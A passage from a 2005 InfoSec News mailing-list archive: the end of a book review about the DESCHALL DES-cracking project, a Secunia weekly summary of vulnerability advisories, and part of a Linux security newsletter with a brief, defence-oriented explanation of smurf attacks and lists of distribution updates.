had an impact on the political debate of this time with regard to the export and control of cryptographic technologies. Curtin gives us interesting periodic updates on the political debate as the DES cracking story moves forward. Cryptography control was defeated at that time, but the use of cryptography is a right that will need continued protection. The political story of DESCHALL was one aspect of the historical impact of the project. Another impact was the explosion of volunteer distributed computing networks after the DESCHALL project, with SETI@home being one of the most obvious examples. DESCHALL clearly demonstrated the viability of this kind of computation. Curtin touches briefly on this here and there, but does not go into detail. I would like him to more clearly spell out the trends in Internet distributed computing. I would like to hear that DESCHALL was derived from project A and that it inspired projects B, C, and D. Was it was the original Internet distributed computing network? Was it a fad that has abated in the last few years? Curtin touches on this a bit, but says, "Some other distributed computing projects like DESCHALL were around," (pg 200.) He says which ones, but doesn't make any claims that DESCHALL inspired SETI@home, for instance. Perhaps such things are never quite clear in the free exchange of ideas on the Internet. The political and community aspects of the story wrap up very nicely. Curtin outlines DESCHALL's impact on driving the AES standard, and its (perhaps much smaller) impact on the debates on key escrow and encryption exports. Brute Force is a very enjoyable read about an important event, and I can happily recommend my friend Matt's book to the Slashdot crowd. My only criticisms can really be summed up by saying, "I want to hear more." From isn at c4i.org Sat Sep 10 00:28:47 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:38:05 2005 Subject: [ISN] Secunia Weekly Summary - Issue: 2005-36 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2005-09-01 - 2005-09-08 This week : 60 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written. Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued. As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet. Secunia Online Vulnerability Database: http://secunia.com/ ======================================================================== 2) This Week in Brief: Secunia Research has discovered a vulnerability in ALZip, which can be exploited by malicious people to compromise a vulnerable system. Additional details can be found in the referenced Secunia advisory. Reference: http://secunia.com/SA16479 VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA16686] OpenSSH Two Security Issues 2. [SA16661] Gentoo update for phpwebsite 3. [SA16560] Windows Registry Editor Utility String Concealment Weakness 4. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability 5. [SA16466] Adobe Acrobat / Reader Plug-in Buffer Overflow Vulnerability 6. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability 7. [SA16653] Symantec Anti-Virus LiveUpdate Credentials Disclosure 8. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities 9. [SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue 10. [SA16683] Barracuda Spam Firewall Multiple Vulnerabilities ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA16722] WebArchiveX ActiveX Control Insecure Methods [SA16698] Free SMTP Server Open Mail Relay Vulnerability [SA16685] Rediff Bol Exposure of Windows Address Book [SA16684] N-Stealth Security Scanner "Server" Header Script Insertion [SA16678] SlimFTPd Denial of Service Vulnerability [SA16666] Savant Web Server Exposure of User Credentials UNIX/Linux: [SA16714] Ubuntu Updates for Multiple Packages [SA16697] Gentoo update for openttd [SA16696] OpenTTD Format String and Buffer Overflow Vulnerabilities [SA16675] Debian update for webcalendar [SA16670] Debian update for phpgroupware [SA16723] Mandriva update for mplayer [SA16709] Fedora update for squid [SA16708] Squid "storeBuffer()" Denial of Service Vulnerability [SA16705] Red Hat update for httpd [SA16704] SqWebMail Conditional Comments Script Insertion Vulnerability [SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue [SA16694] Gentoo update for gnumeric [SA16690] Debian update for zsync [SA16689] Debian update for affix [SA16681] Debian update for proftpd [SA16679] Debian update for pcre3 [SA16677] Trustix update for multiple packages [SA16674] Squid "sslConnectTimeout()" Denial of Service Vulnerability [SA16672] zsync Multiple zlib Vulnerabilities [SA16737] Avaya Intuity Audix cpio Directory Traversal Vulnerability [SA16702] Gentoo update for phpldapadmin [SA16701] UnixWare ICMP Message Handling Denial of Service [SA16686] OpenSSH Two Security Issues [SA16676] Trustix update for cups [SA16730] DCC dccifd Proxy Mode Denial of Service [SA16736] Mandriva update for smb4k [SA16724] Smb4k Insecure Temporary File Handling Vulnerability [SA16720] Ubuntu update for kdebase-bin [SA16716] Mandriva update for kdeedu [SA16715] Mandriva update for kdebase [SA16703] Fedora update for perl-DBI [SA16695] Gentoo update for net-snmp [SA16692] KDE kcheckpass Insecure Lock File Creation Vulnerability [SA16725] Debian udpate for cvs [SA16706] Red Hat update for cvs [SA16687] Debian update for ntp [SA16680] URBAN Symlink and Multiple Local Buffer Overflow Vulnerabilities [SA16673] Debian update for polygen [SA16671] Polygen Output Files Insecure Permissions Weakness Other: [SA16683] Barracuda Spam Firewall Multiple Vulnerabilities Cross Platform: [SA16707] GuppY Multiple Vulnerabilities [SA16693] MAXdev MD-Pro Multiple Vulnerabilities [SA16682] WebGUI Perl Code Execution Vulnerabilities [SA16733] Symantec Brightmail AntiSpam Denial of Service Vulnerabilities [SA16731] MAXdev MD-Pro Cross-Site Scripting and File Upload Vulnerabilities [SA16726] Unclassified NewsBoard "Description" Script Insertion Vulnerability [SA16721] phpCommunityCalendar Multiple Vulnerabilities [SA16710] Land Down Under "neventtext" Script Insertion Vulnerability [SA16699] myBloggie "username" SQL Injection Vulnerability [SA16669] Nikto "Server" Header Script Insertion Vulnerability [SA16667] Phorum "Username" Script Insertion Vulnerability [SA16734] Open WebMail "sessionid" Cross-Site Scripting Vulnerability [SA16668] gBook Unspecified Cross-Site Scripting Vulnerabilities [SA16688] Apache PCRE Integer Overflow Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA16722] WebArchiveX ActiveX Control Insecure Methods Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-07 Brett Moore has reported a vulnerability in WebArchiveX, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16722/ -- [SA16698] Free SMTP Server Open Mail Relay Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-05 basher13 has discovered a vulnerability in Free SMTP Server, which can be exploited by malicious people to use it as an open mail relay. Full Advisory: http://secunia.com/advisories/16698/ -- [SA16685] Rediff Bol Exposure of Windows Address Book Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2005-09-05 Gregory R. Panakkal has discovered a security issue in Rediff Bol, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/16685/ -- [SA16684] N-Stealth Security Scanner "Server" Header Script Insertion Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-02 Mariano Nunez Di Croce has reported a vulnerability in N-Stealth Security Scanner, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16684/ -- [SA16678] SlimFTPd Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-02 Critical Security has discovered a vulnerability in SlimFTPd, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16678/ -- [SA16666] Savant Web Server Exposure of User Credentials Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2005-09-02 basher13 has discovered a security issue in Savant Web Server, which can be exploited by malicious, local users to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/16666/ UNIX/Linux:-- [SA16714] Ubuntu Updates for Multiple Packages Critical: Highly critical Where: From remote Impact: Security Bypass, DoS, System access Released: 2005-09-07 Ubuntu has issued updates for multiple packages. These fix various vulnerabilities and security issues, which can be exploited by malicious people to cause a DoS (Denial of Service), and potentially bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16714/ -- [SA16697] Gentoo update for openttd Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-06 Gentoo has issued an update for openttd. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16697/ -- [SA16696] OpenTTD Format String and Buffer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-06 Alexey Dobriyan has reported some vulnerabilities in OpenTTD, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16696/ -- [SA16675] Debian update for webcalendar Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-02 Debian has issued an update for webcalendar. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16675/ -- [SA16670] Debian update for phpgroupware Critical: Highly critical Where: From remote Impact: Security Bypass, Cross Site Scripting, System access Released: 2005-09-02 Debian has issued an update for phpgroupware. This fixes some vulnerabilities, which can be exploited by malicious administrative users to conduct script insertion attacks, or by malicious people to bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16670/ -- [SA16723] Mandriva update for mplayer Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-07 Mandriva has issued an update for mplayer. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16723/ -- [SA16709] Fedora update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-07 Fedora has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16709/ -- [SA16708] Squid "storeBuffer()" Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-07 Nickolay has reported a vulnerability in Squid, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16708/ -- [SA16705] Red Hat update for httpd Critical: Moderately critical Where: From remote Impact: Security Bypass, DoS Released: 2005-09-06 Red Hat has issued an update for httpd. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16705/ -- [SA16704] SqWebMail Conditional Comments Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-06 Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16704/ -- [SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-05 A security issue has been reported in mod_ssl, which potentially can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16700/ -- [SA16694] Gentoo update for gnumeric Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-05 Gentoo has issued an update for gnumeric. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16694/ -- [SA16690] Debian update for zsync Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-02 Debian has issued an update for zsync. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/16690/ -- [SA16689] Debian update for affix Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-02 Debian has issued an update for affix. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16689/ -- [SA16681] Debian update for proftpd Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, DoS, System access Released: 2005-09-02 Debian has issued an update for proftpd. This fixes two vulnerabilities, which can be exploited by malicious users to disclose certain sensitive information, cause a DoS (Denial of Service), or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16681/ -- [SA16679] Debian update for pcre3 Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-02 Debian has issued an update for pcre3. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16679/ -- [SA16677] Trustix update for multiple packages Critical: Moderately critical Where: From remote Impact: Privilege escalation, DoS, System access Released: 2005-09-02 Trustix has issued updates for multiple packages. These fix some vulnerabilities, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges, and by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16677/ -- [SA16674] Squid "sslConnectTimeout()" Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-02 Alex Masterov has reported a vulnerability in Squid, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16674/ -- [SA16672] zsync Multiple zlib Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-02 Some vulnerabilities have been reported in zsync, which can be exploited by malicious people to conduct a DoS (Denial of Service) or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/16672/ -- [SA16737] Avaya Intuity Audix cpio Directory Traversal Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2005-09-07 Avaya has acknowledged a vulnerability in Intuity Audix, which can be exploited by malicious people to cause files to be unpacked to arbitrary locations on a user's system. Full Advisory: http://secunia.com/advisories/16737/ -- [SA16702] Gentoo update for phpldapadmin Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-09-06 Gentoo has issued an update for phpldapadmin. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16702/ -- [SA16701] UnixWare ICMP Message Handling Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2005-09-05 SCO has issued an update for UnixWare. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) on an active TCP session. Full Advisory: http://secunia.com/advisories/16701/ -- [SA16686] OpenSSH Two Security Issues Critical: Less critical Where: From remote Impact: Security Bypass, Privilege escalation Released: 2005-09-02 Two security issues have been reported in OpenSSH, which can be exploited malicious users to gain escalated privileges or bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16686/ -- [SA16676] Trustix update for cups Critical: Less critical Where: From remote Impact: DoS Released: 2005-09-02 Trustix has issued an update for cups. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) on a vulnerable system. Full Advisory: http://secunia.com/advisories/16676/ -- [SA16730] DCC dccifd Proxy Mode Denial of Service Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-07 Martin Pala has reported a vulnerability in DCC, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16730/ -- [SA16736] Mandriva update for smb4k Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 Mandriva has issued an update for smb4k. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16736/ -- [SA16724] Smb4k Insecure Temporary File Handling Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 A vulnerability has been reported in Smb4K, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16724/ -- [SA16720] Ubuntu update for kdebase-bin Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 Ubuntu has issued an update for kdebase-bin. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16720/ -- [SA16716] Mandriva update for kdeedu Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 Mandriva has issued an update for kdeedu. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions with escalated privileges on a vulnerable system. Full Advisory: http://secunia.com/advisories/16716/ -- [SA16715] Mandriva update for kdebase Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 Mandriva has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16715/ -- [SA16703] Fedora update for perl-DBI Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-06 Fedora has issued an update for perl-DBI. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16703/ -- [SA16695] Gentoo update for net-snmp Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-06 Gentoo has issued an update for net-snmp. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16695/ -- [SA16692] KDE kcheckpass Insecure Lock File Creation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-05 Ilja van Sprundel has reported a vulnerability in kcheckpass, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16692/ -- [SA16725] Debian udpate for cvs Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-07 Debian has issued an update for cvs. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16725/ -- [SA16706] Red Hat update for cvs Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-06 Red Hat has issued an update for cvs. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16706/ -- [SA16687] Debian update for ntp Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-05 Debian has issued an update for ntp. This fixes a security issue, which can cause ntpd to run with incorrect group permissions. Full Advisory: http://secunia.com/advisories/16687/ -- [SA16680] URBAN Symlink and Multiple Local Buffer Overflow Vulnerabilities Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-05 shaun has reported some vulnerabilities in URBAN, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16680/ -- [SA16673] Debian update for polygen Critical: Not critical Where: Local system Impact: Manipulation of data Released: 2005-09-02 Debian has issued an update for polygen. This fixes a weakness, which can be exploited by malicious, local users to manipulate the contents of certain files. Full Advisory: http://secunia.com/advisories/16673/ -- [SA16671] Polygen Output Files Insecure Permissions Weakness Critical: Not critical Where: Local system Impact: Manipulation of data Released: 2005-09-02 Justin B Rye has reported a weakness in polygen, which can be exploited by malicious, local users to manipulate certain information. Full Advisory: http://secunia.com/advisories/16671/ Other:-- [SA16683] Barracuda Spam Firewall Multiple Vulnerabilities Critical: Moderately critical Where: From local network Impact: Manipulation of data, Exposure of system information, Exposure of sensitive information, System access Released: 2005-09-02 Francois Harvey has reported some vulnerabilities in Barracuda Spam Firewall, which can be exploited by malicious users to disclose and manipulate sensitive information and by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16683/ Cross Platform:-- [SA16707] GuppY Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2005-09-06 Romano_45 has reported some vulnerabilities in GuppY, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks, and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16707/ -- [SA16693] MAXdev MD-Pro Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Unknown, System access Released: 2005-09-05 Some vulnerabilities have been reported in MAXdev MD-Pro, where some have unknown impacts and others can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16693/ -- [SA16682] WebGUI Perl Code Execution Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-02 Some vulnerabilities have been reported in WebGUI, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16682/ -- [SA16733] Symantec Brightmail AntiSpam Denial of Service Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-07 Two vulnerabilities have been reported in Brightmail, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16733/ -- [SA16731] MAXdev MD-Pro Cross-Site Scripting and File Upload Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of system information, System access Released: 2005-09-07 rgod has discovered some vulnerabilities in MAXdev MD-Pro, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16731/ -- [SA16726] Unclassified NewsBoard "Description" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-07 rgod has discovered a vulnerability in Unclassified NewsBoard, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16726/ -- [SA16721] phpCommunityCalendar Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Manipulation of data Released: 2005-09-07 rgod has discovered some vulnerabilities in phpCommunityCalendar, which can be exploited by malicious people to conduct cross-site scripting, script insertion and SQL injection attacks. Full Advisory: http://secunia.com/advisories/16721/ -- [SA16710] Land Down Under "neventtext" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-07 conor.e.buckley has discovered a vulnerability in Land Down Under, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16710/ -- [SA16699] myBloggie "username" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Manipulation of data Released: 2005-09-05 OS2A has reported a vulnerability in myBloggie, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16699/ -- [SA16669] Nikto "Server" Header Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-02 Mariano Nunez Di Croce has reported a vulnerability in Nikto, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16669/ -- [SA16667] Phorum "Username" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-02 Scott Dewey has reported a vulnerability in Phorum, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16667/ -- [SA16734] Open WebMail "sessionid" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-07 s3cure has reported a vulnerability in Open WebMail, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16734/ -- [SA16668] gBook Unspecified Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-02 Some vulnerabilities have been reported in gBook, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16668/ -- [SA16688] Apache PCRE Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-05 A vulnerability has been reported in Apache, which can be exploited by malicious, local users to gain escalated privileges via a specially crafted ".htaccess" file. Full Advisory: http://secunia.com/advisories/16688/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Sat Sep 10 00:29:21 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:38:53 2005 Subject: [ISN] Linux Advisory Watch - September 9th 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 9th, 2005 Volume 6, Number 37a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week, advisories were released for proftpd, sqwebmail, polygen, affix, zsync, phpgroupware, webcalendar, pcre3, ntp, cvs, kdelibs, evince, openmotif, cman, gnbd-kernel, dlm-kernel, lockdev, perl, termcap, ckermit, kdegraphics, squid, pam, setup, tar, openssh, tzdata, httpd, mplayer, and phpldapadmin. The distributors include Debian, Fedora, Gentoo, and Red Hat. --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- Introduction: IP Spoofing, Part III ICMP Smurfing By: Suhas A Desai "Smurf" is the name of an automated program that attacks a network by exploiting IP broadcast addressing. Smurf and similar programs can cause the attacked part of a network to become "inoperable." Network nodes and their administrators to exchange information about the state of the network use ICMP. A smurf program builds a network packet with a spoofed victim source address. The packet contains an ICMP ping message addressed to an IP broadcast address, meaning all IP addresses in a given network. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will reply to it with an ICMP echo reply each. The echo responses to the ping message are sent back to the victim address. Enough pings and resultant echoes can flood the network making it unusable for real traffic. A related attack is called "fraggle", simple re-write of smurf; uses UDP echo packets in the same fashion as the ICMP echo packets. The intermediary (broadcast) devices, and the spoofed victim are both hurt by this attack. The attackers rely on the ability to source spoofed packets to the "amplifiers" in order to generate the traffic which causes the denial of service. In order to stop this, all networks should perform filtering either at the edge of the network where customers connect (access layer) or at the edge of the network with connections to the upstream providers, in order to defeat the possibility of source address spoofed packets from entering from downstream networks, or leaving for upstream networks. One way to defeat smurfing is to disable IP broadcast addressing at each network router since it is seldom used. READ ENTIRE ARTICLE: http://www.linuxsecurity.com/content/view/120225/49/ ---------------------- Linux File & Directory Permissions Mistakes One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com. http://www.linuxsecurity.com/content/view/119415/49/ --- Buffer Overflow Basics A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. http://www.linuxsecurity.com/content/view/119087/49/ --- Review: The Book of Postfix: State-of-the-Art Message Transport I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Pattrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection. http://www.linuxsecurity.com/content/view/119027/49/ -------- --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: New proftpd packages fix format string vulnerability 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120281 * Debian: New sqwebmail packages fix cross-site scripting 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120273 * Debian: New Mozilla Firefox packages fix several vulnerabilities 1st, September, 2005 Update Package. http://www.linuxsecurity.com/content/view/120278 * Debian: New polygen packages fix denial of service 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120280 * Debian: New affix packages fix remote command execution 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120282 * Debian: New zsync packages fix DOS 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120283 * Debian: New phproupware packages fix several vulnerabilities 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120285 * Debian: New webcalendar packages fix remote code execution 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120287 * Debian: New pcre3 packages fix arbitrary code execution 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120288 * Debian: Updated i386 proftpd packages fix format string vulnerability 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120294 * Debian: New ntp packages fix group id confusion 5th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120298 * Debian: New cvs packages fix insecure temporary files 7th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120319 * Debian: New Apache packages fix HTTP request smuggling 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120330 * Debian: New kdelibs packages fix backup file information leak 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120332 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora Core 4 Update: evince-0.4.0-1.2 1st, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120279 * Fedora Core 4 Update: openmotif-2.2.3-10.FC4.1 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120289 * Fedora Core 4 Update: cman-kernel-2.6.11.5-20050601.152643.FC4.12 2nd, September, 2005 Rebuild for latest kernel, 2.6.12-1.1447_FC4. http://www.linuxsecurity.com/content/view/120290 * Fedora Core 4 Update: gnbd-kernel-2.6.11.2-20050420.133124.FC4.45 2nd, September, 2005 Rebuild for latest kernel, 2.6.12-1.1447_FC4. http://www.linuxsecurity.com/content/view/120291 * Fedora Core 4 Update: dlm-kernel-2.6.11.5-20050601.152643.FC4.12 2nd, September, 2005 Rebuild for latest kernel, 2.6.12-1.1447_FC4. http://www.linuxsecurity.com/content/view/120292 * Fedora Core 4 Update: GFS-kernel-2.6.11.8-20050601.152643.FC4.14 2nd, September, 2005 Rebuild for latest kernel, 2.6.12-1.1447_FC4. 